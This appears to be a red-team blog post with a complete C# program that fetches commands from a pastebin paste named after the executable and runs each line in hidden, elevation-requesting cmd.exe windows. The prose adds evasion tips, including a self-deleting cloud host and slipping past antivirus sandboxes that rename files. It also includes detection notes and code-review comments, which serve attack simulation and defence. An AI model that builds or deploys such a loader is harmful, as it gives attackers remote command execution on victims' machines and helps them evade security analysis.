The following is a C# code example that fetches commands straight from pastebin and runs them. It can serve as an alternative way to simulate malware attacks without putting the malicious code on disk. You could use any URL here, but pastebin is a realistic choice because many malware families use the site for this purpose.
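The name you give the compiled executable or DLL (if sideloading) is used as the unique identifier of the paste on pastebin from which the commands are fetched. As a result, the process arguments contain no suspicious parameters indicating where the commands came from, and the same compiled exe can be reused to run different OS commands. For detection, this means the launcher's own command line shows nothing; the observable signals are the outbound request to pastebin.com/raw/ and the cmd.exe child processes that follow it.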
You could go even more stealth if you run your own server in cloud and content on the URL you fetch from is deleted after it has been fetched.
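As a side note, the code below may bypass some antivirus engines – especially those that rename the file when running it in a sandbox. If the file is renamed, it requests a different paste and never runs any “malicious content”. A clean sandbox verdict on a renamed sample therefore says nothing about how the file behaves under its original name, so analysis should preserve the submitted file name.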
using System;
using System.Net;
using System.IO;
using System.Diagnostics;
namespace BinFetcher
{
// Attack-simulation stub: downloads a text resource whose identifier is taken
// from the running process name, then hands every line of it to cmd.exe.
// The response body is executed as-is, with no signature, allow-list or other
// check, so whoever controls the paste controls what runs on the host.
//
// Detection notes for the behaviour shown below:
//   - outbound HTTPS/DNS to pastebin.com from a non-browser process
//     (proxy/DNS logs, Sysmon Event ID 3 and 22);
//   - that same process spawning C:\Windows\System32\cmd.exe with "/c ..."
//     and a hidden window (Security Event ID 4688 with command-line
//     auditing, Sysmon Event ID 1);
//   - the fetched commands appear only in the child cmd.exe command line,
//     not in the arguments of this process.
class Program
{
// Entry point. args is not read anywhere in this method.
static void Main(string[] args)
{
// Fixed-size buffer: a response with 1000 or more lines makes the read loop
// index past the end of the array and throw IndexOutOfRangeException.
string[] lines = new string[1000];
int i = 0;
int max = 0;
// NOTE(review): the WebClient is never disposed; it lives until process exit.
var client = new WebClient();
// Process.ProcessName is the image name without the ".exe" extension.
var exec = System.Diagnostics.Process.GetCurrentProcess().ProcessName;
// Keeps only the text after the first '.'; when the name has no '.',
// IndexOf returns -1 and the whole name is kept.
exec = exec.Substring(exec.IndexOf('.') + 1);
/* If you call the file sS6GRywC.exe it will run commands from https://pastebin.com/raw/sS6GRywC */
// The paste ID is never validated; any process name yields a request URL.
var url = "https://pastebin.com/raw/"+exec;
Console.WriteLine("Current executable: " + exec);
Console.WriteLine("Reading from: " + url + "\n");
// OpenRead issues the request; a missing paste or a network failure surfaces
// as an unhandled exception because nothing here catches it.
using (var stream = client.OpenRead(url))
using (var reader = new StreamReader(stream))
{
// Read the response line by line until ReadLine returns null (end of stream).
while ((lines[i] = reader.ReadLine()) != null)
{
i++;
}
// Number of lines actually read.
max = i;
}
// One cmd.exe process is started per fetched line.
for (i = 0; i < max; i++)
{
Console.WriteLine("Executing:" + lines[i]);
var proc1 = new ProcessStartInfo();
// UseShellExecute must be true for the Verb below to be honoured.
proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\Windows\System32";
proc1.FileName = @"C:\Windows\System32\cmd.exe";
// "runas" requests elevation; this normally produces a UAC consent prompt
// for each command unless the caller is already elevated.
proc1.Verb = "runas";
// The fetched line is appended unmodified, so it can contain any cmd.exe
// syntax, including chained commands.
proc1.Arguments = "/c " + lines[i];
// No visible console window for the child process.
proc1.WindowStyle = ProcessWindowStyle.Hidden;
// Fire-and-forget: the returned Process is discarded and never waited on,
// so commands may overlap and their exit codes are not observed.
Process.Start(proc1);
}
}
}
}